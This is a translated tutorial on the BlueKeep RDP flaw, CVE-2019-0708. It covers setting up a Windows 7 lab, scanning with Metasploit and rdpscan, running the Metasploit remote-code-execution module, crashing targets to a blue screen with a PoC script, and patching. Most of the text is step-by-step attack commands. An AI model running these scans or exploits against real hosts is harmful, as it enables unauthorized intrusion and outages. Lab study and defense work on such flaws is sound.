CVE-2019-0708 windwos remote desktop protocol (RDP) vulnerability exploitation and hardening

---

Vulnerability description

  When an unauthenticated attacker uses RDP to connect to the target system and send a specially designed request (also known as "Remote Desktop Service Remote Code Execution Vulnerability"), there is a remote code execution vulnerability in Remote Desktop Service (previously known as For terminal services).

Impact version

• Windows XP SP3 x86
• Windows XP Professional x64 Edition SP2
• Windows XP Embedded SP3 x86
• Windows Server 2003 SP2 x86
• Windows Server 2003 x64 version SP2
• Windows Server 2003 R2 SP2
• Windows Server 2003 R2 x64版SP2
• Windows Vista SP2
• Windows Vista x64 version SP2
• Windows 7

Vulnerability environment construction

Thunder download:

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

When creating a virtual machine, remember to choose the professional version to install, the default home version (the home version has no remote connection)

enables remote connection

Vulnerability detection

kali tool

Start msf

msfconsole

Search vulnerability detection exp

search 2019_0708

Load the module, set the ip to be detected

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 192.168.234.129
run

The prompt The target is vulnerableindicates that the vulnerability exists.

Multi-ip detection only needs to set the ip format to the following rules

set rhosts 192.168.234.128-133

Detection tool under windows

Tool download address: https://github.com/k8gege/CVE-2019-0708

Tool usage:

#批量扫描
rdpscan.exe 192.168.234.1-192.168.234.254
#单个扫描
rdpscan.exe 192.168.234.129

If there VULNERABLE - CVE-2019-0708is a vulnerability

Exploit

Vulnerability restrictions are relatively large, the rec scripts currently found are only for windows 7 systems

Remote code execution

Attack machine: kali
target machine: windows 7

#启动msf
msfconsole

# 搜索2019-0708漏洞模块
search 2019-0708
#选择利用模块
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
#设置ip并进行工具
set rhosts 192.168.234.132
#修改目标系统类型（视情况而定）
set target 1
#执行攻击
run

If set target 1not, we need to try the exp scripts of other systems, show targetsyou can view the exp scripts for the corresponding system

Blue screen

Use tool:
https://github.com/CVE-2019-0708/CVE-2019-0708

Instructions:

#python PoC.py ip
python PoC.py 192.168.234.129

Can use WinXP | XP Embedded | Win7 | Server 2003 | Server 2008 system blue screen

Vulnerability hardening

1. Install a 360, Tinder and other security software.
2. Install the official Microsoft patch: https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708